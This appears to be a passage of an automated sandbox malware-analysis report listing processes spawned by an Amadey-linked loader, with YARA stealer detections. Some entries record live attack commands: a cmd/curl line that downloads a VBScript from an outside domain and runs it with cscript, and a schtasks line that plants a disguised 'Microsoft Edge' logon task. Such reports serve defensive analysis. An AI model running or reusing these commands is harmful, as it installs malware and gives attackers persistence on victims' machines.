                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2302324520.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:7
                                                                                                                                                                Start time:11:42:03
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe"
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:435'820 bytes
                                                                                                                                                                MD5 hash:7DF3608AE8EA69762C71DA1C05F0C043
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:8
                                                                                                                                                                Start time:11:42:05
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php && cscript conf.vbs
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:9
                                                                                                                                                                Start time:11:42:05
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:10
                                                                                                                                                                Start time:11:42:05
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\curl.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php
                                                                                                                                                                Imagebase:0x7ff646080000
                                                                                                                                                                File size:530'944 bytes
                                                                                                                                                                MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:11
                                                                                                                                                                Start time:11:42:06
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cscript.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:cscript conf.vbs
                                                                                                                                                                Imagebase:0x7ff7d3810000
                                                                                                                                                                File size:161'280 bytes
                                                                                                                                                                MD5 hash:24590BF74BBBBFD7D7AC070F4E3C44FD
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:12
                                                                                                                                                                Start time:11:42:06
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe" /sc onlogon /rl highest /f
                                                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                                                File size:235'008 bytes
                                                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:13
                                                                                                                                                                Start time:11:42:06
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:14
                                                                                                                                                                Start time:11:42:07
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                File size:435'820 bytes
                                                                                                                                                                MD5 hash:7DF3608AE8EA69762C71DA1C05F0C043
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low
                                                                                                                                                                Has exited:false

                                                                                                                                                                General

                                                                                                                                                                Target ID:15
                                                                                                                                                                Start time:11:42:08
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:16
                                                                                                                                                                Start time:11:42:08
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:17
                                                                                                                                                                Start time:11:42:08
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:18
                                                                                                                                                                Start time:11:42:08
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:19
                                                                                                                                                                Start time:11:42:09
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:20
                                                                                                                                                                Start time:11:42:09
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:21
                                                                                                                                                                Start time:11:42:10
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:22
                                                                                                                                                                Start time:11:42:10
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:23
                                                                                                                                                                Start time:11:42:10
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:24
                                                                                                                                                                Start time:11:42:10
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:25
                                                                                                                                                                Start time:11:42:11
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:26
                                                                                                                                                                Start time:11:42:11
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:27
                                                                                                                                                                Start time:11:42:11
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:28
                                                                                                                                                                Start time:11:42:11
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:29
                                                                                                                                                                Start time:11:42:13
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7bb480000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:30
                                                                                                                                                                Start time:11:42:13
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:31
                                                                                                                                                                Start time:11:42:13
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:32
                                                                                                                                                                Start time:11:42:13
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:33
                                                                                                                                                                Start time:11:42:14
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:34
                                                                                                                                                                Start time:11:42:14
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:35
                                                                                                                                                                Start time:11:42:14
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:36
                                                                                                                                                                Start time:11:42:14
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:37
                                                                                                                                                                Start time:11:42:15
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:38
                                                                                                                                                                Start time:11:42:16
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:39
                                                                                                                                                                Start time:11:42:16
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:40
                                                                                                                                                                Start time:11:42:16
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:41
                                                                                                                                                                Start time:11:42:17
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:42
                                                                                                                                                                Start time:11:42:17
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:43
                                                                                                                                                                Start time:11:42:17
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:44
                                                                                                                                                                Start time:11:42:17
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:45
                                                                                                                                                                Start time:11:42:18
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:46
                                                                                                                                                                Start time:11:42:18
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:47
                                                                                                                                                                Start time:11:42:18
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:48
                                                                                                                                                                Start time:11:42:18
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                General

                                                                                                                                                                Target ID:50
                                                                                                                                                                Start time:11:42:20
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
